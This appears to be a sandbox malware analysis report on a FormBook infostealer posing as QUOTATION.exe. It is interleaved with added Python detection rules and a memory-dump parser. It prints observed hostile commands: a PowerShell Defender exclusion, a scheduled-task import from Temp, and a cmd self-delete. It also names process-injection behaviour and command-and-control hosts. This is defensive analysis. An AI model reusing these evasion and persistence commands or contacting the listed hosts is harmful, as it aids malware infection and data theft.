Source: C:\Windows\explorer.exe, Network Connect: 208.51.62.42 80
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\QUOTATION.exe, Section unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: 1050000
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\QUOTATION.exe, Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write (2 occurrences)
Source: C:\Users\user\Desktop\QUOTATION.exe, Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write (2 occurrences)
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\QUOTATION.exe, Thread APC queued: target process: C:\Windows\explorer.exe
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\QUOTATION.exe, Thread register set: target process: 3352 (2 occurrences)
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Thread register set: target process: 3352
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\QUOTATION.exe, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exe (3 occurrences)
Source: C:\Users\user\Desktop\QUOTATION.exe, Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lQdAGavApIJoo" /XML "C:\Users\user\AppData\Local\Temp\tmp8E88.tmp
Source: C:\Users\user\Desktop\QUOTATION.exe, Process created: C:\Users\user\Desktop\QUOTATION.exe C:\Users\user\Desktop\QUOTATION.exe (2 occurrences)
Source: C:\Users\user\Desktop\QUOTATION.exe, Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\QUOTATION.exe"
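The process-creation chain above (PowerShell adding a Defender exclusion, schtasks importing task XML from the user's Temp directory, NETSTAT.EXE started by a Desktop binary, then cmd.exe deleting the original sample) is what the cited Sigma rules "Powershell Defender Exclusion" and "Suspicius Add Task From User AppData Temp" are built to catch. The rules below are an added example, not code from the report or from the sandbox vendor, written to show how each of those four launches would be matched on process-creation telemetry; the event field names (parent_image, image, command_line), the rule names, the WATCHED_TOOLS set and SAMPLE_EVENTS are constructed for this example.

```python
"""Process-creation rules for the command lines listed above (added example).

Not code from the report or from the sandbox vendor: an added illustration
of how the PowerShell, schtasks, NETSTAT.EXE and cmd.exe launches shown above
would be matched by process-creation detection logic, in the spirit of the
Sigma rules the report cites ("Powershell Defender Exclusion", "Suspicius
Add Task From User AppData Temp"). The event field names (parent_image,
image, command_line), the rule names and SAMPLE_EVENTS are constructed for
this example.
"""
import re
from typing import Callable, Dict, List

Event = Dict[str, str]

# System tools seen hollowed in this report; extend with others you observe.
WATCHED_TOOLS = {"netstat.exe"}


def _image_name(path: str) -> str:
    """Lower-cased file name component of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def defender_exclusion(e: Event) -> bool:
    """PowerShell adding a Defender exclusion (path, process or extension)."""
    cl = e["command_line"]
    return (_image_name(e["image"]) in ("powershell.exe", "pwsh.exe")
            and re.search(r"add-mppreference", cl, re.I) is not None
            and re.search(r"-exclusion(path|process|extension)", cl, re.I) is not None)


def schtasks_xml_from_temp(e: Event) -> bool:
    """schtasks /Create importing its task definition from a user's Temp dir."""
    cl = e["command_line"]
    return (_image_name(e["image"]) == "schtasks.exe"
            and re.search(r"/create\b", cl, re.I) is not None
            and re.search(r'/xml\s+"?[^"]*\\AppData\\Local\\Temp\\', cl, re.I) is not None)


def self_delete_via_cmd(e: Event) -> bool:
    """cmd.exe deleting an executable under C:\\Users (self-deletion pattern)."""
    cl = e["command_line"]
    return (_image_name(e["image"]) == "cmd.exe"
            and re.search(r'/c\s+del\s+"?[^"]*\\Users\\[^"]*\.exe', cl, re.I) is not None)


def system_tool_from_user_path(e: Event) -> bool:
    """A watched System32/SysWOW64 tool whose parent lives under \\Users.

    Heuristic: here the hollowed NETSTAT.EXE is a child of the sample on the
    user's Desktop. Allow-list your own user-directory tooling before use.
    """
    image = e["image"].replace("/", "\\").lower()
    parent = e.get("parent_image", "").replace("/", "\\").lower()
    return (_image_name(image) in WATCHED_TOOLS
            and ("\\windows\\system32\\" in image or "\\windows\\syswow64\\" in image)
            and "\\users\\" in parent)


RULES: Dict[str, Callable[[Event], bool]] = {
    "powershell_defender_exclusion": defender_exclusion,
    "schtasks_xml_from_user_temp": schtasks_xml_from_temp,
    "system_tool_spawned_from_user_path": system_tool_from_user_path,
    "cmd_self_delete": self_delete_via_cmd,
}


def evaluate(events: List[Event]) -> List[List[str]]:
    """Names of the rules that fire for each event, in event order."""
    return [[name for name, rule in RULES.items() if rule(e)] for e in events]


# Constructed events mirroring the process creations listed above, plus one
# benign control; not exported from the sandbox.
SAMPLE_EVENTS: List[Event] = [
    {"parent_image": r"C:\Users\user\Desktop\QUOTATION.exe",
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
                     r'Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exe"'},
    {"parent_image": r"C:\Users\user\Desktop\QUOTATION.exe",
     "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "command_line": r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lQdAGavApIJoo" '
                     r'/XML "C:\Users\user\AppData\Local\Temp\tmp8E88.tmp"'},
    {"parent_image": r"C:\Users\user\Desktop\QUOTATION.exe",
     "image": r"C:\Windows\SysWOW64\NETSTAT.EXE",
     "command_line": r"C:\Windows\SysWOW64\NETSTAT.EXE"},
    {"parent_image": r"C:\Windows\SysWOW64\NETSTAT.EXE",
     "image": r"C:\Windows\SysWOW64\cmd.exe",
     "command_line": r'cmd.exe /c del "C:\Users\user\Desktop\QUOTATION.exe"'},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r'cmd.exe /c dir "C:\Users\user\Desktop"'},
]

if __name__ == "__main__":
    for event, fired in zip(SAMPLE_EVENTS, evaluate(SAMPLE_EVENTS)):
        print(f"{_image_name(event['image']):<16} {fired or ['-']}")
```

The exclusion and schtasks rules are the high-confidence ones; the parent-path heuristic for NETSTAT.EXE is noisier and is the one to tune against your own environment before alerting on it. None of these rules sees the injection into explorer.exe itself, which needs thread or memory telemetry rather than process creation.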
Source: explorer.exe, 00000013.00000000.299565234.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 00000013.00000000.336419113.0000000000B68000.00000004.00000020.sdmp, Binary or memory string: Progman\Pr
Source: explorer.exe, 00000013.00000000.336798226.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000013.00000000.320364799.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000013.00000000.299819955.00000000011E0000.00000002.00020000.sdmp, NETSTAT.EXE, 00000018.00000002.549239748.00000000046B0000.00000002.00020000.sdmp, Binary or memory string: Program Manager
Source: explorer.exe, 00000013.00000000.323444529.0000000005E10000.00000004.00000001.sdmp, explorer.exe, 00000013.00000000.336798226.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000013.00000000.320364799.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000013.00000000.299819955.00000000011E0000.00000002.00020000.sdmp, NETSTAT.EXE, 00000018.00000002.549239748.00000000046B0000.00000002.00020000.sdmp, Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000013.00000000.336798226.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000013.00000000.320364799.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000013.00000000.299819955.00000000011E0000.00000002.00020000.sdmp, NETSTAT.EXE, 00000018.00000002.549239748.00000000046B0000.00000002.00020000.sdmp, Binary or memory string: Progman
Source: explorer.exe, 00000013.00000000.336798226.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000013.00000000.320364799.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000013.00000000.299819955.00000000011E0000.00000002.00020000.sdmp, NETSTAT.EXE, 00000018.00000002.549239748.00000000046B0000.00000002.00020000.sdmp, Binary or memory string: Progmanlock
Source: explorer.exe, 00000013.00000000.344152528.0000000008778000.00000004.00000001.sdmp, explorer.exe, 00000013.00000000.309030845.0000000008778000.00000004.00000001.sdmp, explorer.exe, 00000013.00000000.328622205.0000000008778000.00000004.00000001.sdmp, Binary or memory string: Shell_TrayWndh
Source: C:\Users\user\Desktop\QUOTATION.exe, Queries volume information: C:\Users\user\Desktop\QUOTATION.exe VolumeInformation
Source: C:\Users\user\Desktop\QUOTATION.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\QUOTATION.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\QUOTATION.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\QUOTATION.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation (3 occurrences)
Source: C:\Users\user\Desktop\QUOTATION.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation (3 occurrences)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation (7 occurrences)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation (3 occurrences)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\ VolumeInformation (3 occurrences)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation (3 occurrences)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation (2 occurrences)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Users\user\Desktop\QUOTATION.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match, File source: 17.0.QUOTATION.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match, File source: 17.0.QUOTATION.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 17.0.QUOTATION.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match, File source: 17.0.QUOTATION.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 17.2.QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 17.0.QUOTATION.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match, File source: 17.2.QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000018.00000002.545684823.0000000000D50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000013.00000000.332122675.000000000FD1B000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000000.296229460.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000002.378010421.0000000000B40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000018.00000002.545541618.0000000000D20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000000.295558217.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.300134534.0000000003739000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000002.378361969.0000000000F70000.00000040.00020000.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook
Source: Yara match; file source: 17.0.QUOTATION.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match; file source: 17.0.QUOTATION.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match; file source: 17.0.QUOTATION.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match; file source: 17.0.QUOTATION.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match; file source: 17.2.QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; file source: 17.0.QUOTATION.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match; file source: 17.2.QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; file source: 00000018.00000002.545684823.0000000000D50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; file source: 00000013.00000000.332122675.000000000FD1B000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; file source: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; file source: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; file source: 00000011.00000000.296229460.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; file source: 00000011.00000002.378010421.0000000000B40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; file source: 00000018.00000002.545541618.0000000000D20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; file source: 00000011.00000000.295558217.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; file source: 00000001.00000002.300134534.0000000003739000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; file source: 00000011.00000002.378361969.0000000000F70000.00000040.00020000.sdmp, type: MEMORY
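The memory-dump names in the match list above follow a fixed dotted layout, and reading them tells you where the unpacked FormBook image actually lives. The Python helper below is an added triage example, not part of the Joe Sandbox report or its tooling. Its field layout is an assumption inferred from the report's own cross-references: the first field is the process index in hex (0x11 = 17, matching the "17.0.QUOTATION.exe.400000..." unpack names), the second a phase number, the fourth the region base (0x400000 is the image base in the static PE info), and the fifth a Windows PAGE_* protection constant (0x40 = PAGE_EXECUTE_READWRITE, 0x04 = PAGE_READWRITE). The third and sixth fields are treated as opaque, and the process-index-to-name map is taken only from the places where the report pairs a dump name with a process name.

```python
"""Decode Joe Sandbox memory-dump names from the Yara match list.

Added example, not part of the report. Field layout is inferred from the
report's own cross-references; fields 3 and 6 are left opaque.
"""
import re
from dataclasses import dataclass

# Process index -> image name, only where the report pairs them explicitly
# ("QUOTATION.exe, 00000001...sdmp", "17.x.QUOTATION.exe...", "NETSTAT.EXE, 00000018...sdmp").
PROCESS_NAMES = {0x01: "QUOTATION.exe", 0x11: "QUOTATION.exe", 0x18: "NETSTAT.EXE"}

# Windows memory protection constants (low byte of the fifth field).
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}

DUMP_RE = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<phase>[0-9A-Fa-f]{8})\.(?P<id>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<prot>[0-9A-Fa-f]{8})\.(?P<flags>[0-9A-Fa-f]{8})\.sdmp$"
)


@dataclass(frozen=True)
class DumpName:
    process_index: int
    process_name: str
    phase: int
    base: int
    protection: int
    protection_name: str
    executable: bool
    writable: bool
    raw_flags: int          # sixth field, meaning not documented on the page


def parse_dump_name(name: str) -> DumpName:
    m = DUMP_RE.match(name.strip())
    if not m:
        raise ValueError(f"not a Joe Sandbox dump name: {name!r}")
    proc = int(m["proc"], 16)
    prot = int(m["prot"], 16)
    base_prot = prot & 0xFF
    return DumpName(
        process_index=proc,
        process_name=PROCESS_NAMES.get(proc, "unknown"),
        phase=int(m["phase"], 16),
        base=int(m["base"], 16),
        protection=prot,
        protection_name=PAGE_PROTECTION.get(base_prot, f"0x{prot:x}"),
        executable=base_prot in (0x10, 0x20, 0x40, 0x80),
        writable=base_prot in (0x04, 0x08, 0x40, 0x80),
        raw_flags=int(m["flags"], 16),
    )


def rwx_regions(names):
    """Dumps that are both writable and executable: where unpacked or injected code lives."""
    return [d for d in map(parse_dump_name, names) if d.executable and d.writable]


# Input: the FormBook Yara memory hits exactly as listed in the report.
YARA_HITS = [
    "00000018.00000002.545684823.0000000000D50000.00000004.00000001.sdmp",
    "00000013.00000000.332122675.000000000FD1B000.00000040.00020000.sdmp",
    "00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp",
    "00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp",
    "00000011.00000000.296229460.0000000000400000.00000040.00000001.sdmp",
    "00000011.00000002.378010421.0000000000B40000.00000040.00020000.sdmp",
    "00000018.00000002.545541618.0000000000D20000.00000040.00020000.sdmp",
    "00000011.00000000.295558217.0000000000400000.00000040.00000001.sdmp",
    "00000001.00000002.300134534.0000000003739000.00000004.00000001.sdmp",
    "00000011.00000002.378361969.0000000000F70000.00000040.00020000.sdmp",
]


def summarize(names=YARA_HITS):
    """Group RWX hits by process so the hollowed image and the injected regions stand out."""
    out = {}
    for d in rwx_regions(names):
        out.setdefault((d.process_index, d.process_name), []).append(hex(d.base))
    return out


if __name__ == "__main__":
    for (idx, name), bases in sorted(summarize().items()):
        print(f"process {idx} ({name}): RWX regions at {', '.join(bases)}")
```

Run on the list above, the RWX hits at 0x400000 in process 17 (the second QUOTATION.exe, which the behavior section flags for process hollowing) and the RWX hits in process 24 (NETSTAT.EXE) are the regions to pull for config extraction; the two PAGE_READWRITE hits are data copies, not executable code.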

          Mitre Att&ck Matrix

Columns are ATT&CK tactics; each row lists one technique per column. The trailing digits are the report's per-technique hit badges.

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Shared Modules 1 | Scheduled Task/Job 1 | Process Injection 512 | Disable or Modify Tools 11 | Credential API Hooking 1 | System Network Connections Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job 1 | Boot or Logon Initialization Scripts | Scheduled Task/Job 1 | Deobfuscate/Decode Files or Information 1 | LSASS Memory | File and Directory Discovery 1 | Remote Desktop Protocol | Credential API Hooking 1 | Exfiltration Over Bluetooth | Encrypted Channel 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information 4 | Security Account Manager | System Information Discovery 112 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Software Packing 13 | NTDS | Security Software Discovery 321 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 12 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | File Deletion 1 | LSA Secrets | Process Discovery 2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Rootkit 1 | Cached Domain Credentials | Virtualization/Sandbox Evasion 31 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Masquerading 1 | DCSync | Application Window Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Virtualization/Sandbox Evasion 31 | Proc Filesystem | Remote System Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Process Injection 512 | /etc/passwd and /etc/shadow | System Network Configuration Discovery 1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

          Behavior Graph

Behavior Graph ID: 532906, Sample: QUOTATION.exe, Start date: 02/12/2021, Architecture: WINDOWS, Score: 100

The rendered graph is reproduced here as a process tree; dropped files, network contacts and triggered signatures are listed under the process that produced them.

Analysis root
  DNS: www.archedbeautynw.com
  Signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 11 other signatures
  QUOTATION.exe (started)
    Dropped: C:\Users\user\AppData\...\lQdAGavApIJoo.exe (PE32); C:\Users\user\AppData\Local\...\tmp8E88.tmp (XML); C:\Users\user\AppData\...\QUOTATION.exe.log (ASCII)
    Signatures: Uses schtasks.exe or at.exe to add and modify task schedules; Uses netstat to query active network connections and open ports; Adds a directory exclusion to Windows Defender; Tries to detect virtualization through RDTSC time measurements
    QUOTATION.exe (started)
      Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
      NETSTAT.EXE (started)
        Signatures: Self deletion via cmd delete; Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
        cmd.exe (started)
          conhost.exe (started)
      explorer.exe (injected)
        Network: purelai.store 208.51.62.42, local port 49786 to remote port 80, NETRANGEUS, United States; www.purelai.store
        Signature: System process connects to network (likely due to code injection or exploit)
        autoconv.exe (started)
    powershell.exe (started)
      conhost.exe (started)
    schtasks.exe (started)
      conhost.exe (started)
    QUOTATION.exe (started)


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

Source | Detection | Scanner | Label
QUOTATION.exe | 40% | Virustotal |
QUOTATION.exe | 18% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla

The ReversingLabs label (AgentTesla) disagrees with the Yara and configuration-based FormBook classification in the Signatures section. Vendor labels for packed .NET droppers are frequently generic or wrong; the Yara matches on the unpacked image and the extracted C2 URL are the stronger evidence for the family.

          Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exe | 18% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla

          Unpacked PE Files

Source | Detection | Scanner | Label
17.0.QUOTATION.exe.400000.6.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
17.0.QUOTATION.exe.400000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
17.2.QUOTATION.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
17.0.QUOTATION.exe.400000.8.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

Source | Detection | Scanner | Label
purelai.store | 2% | Virustotal |

          URLs

Source | Detection | Scanner | Label
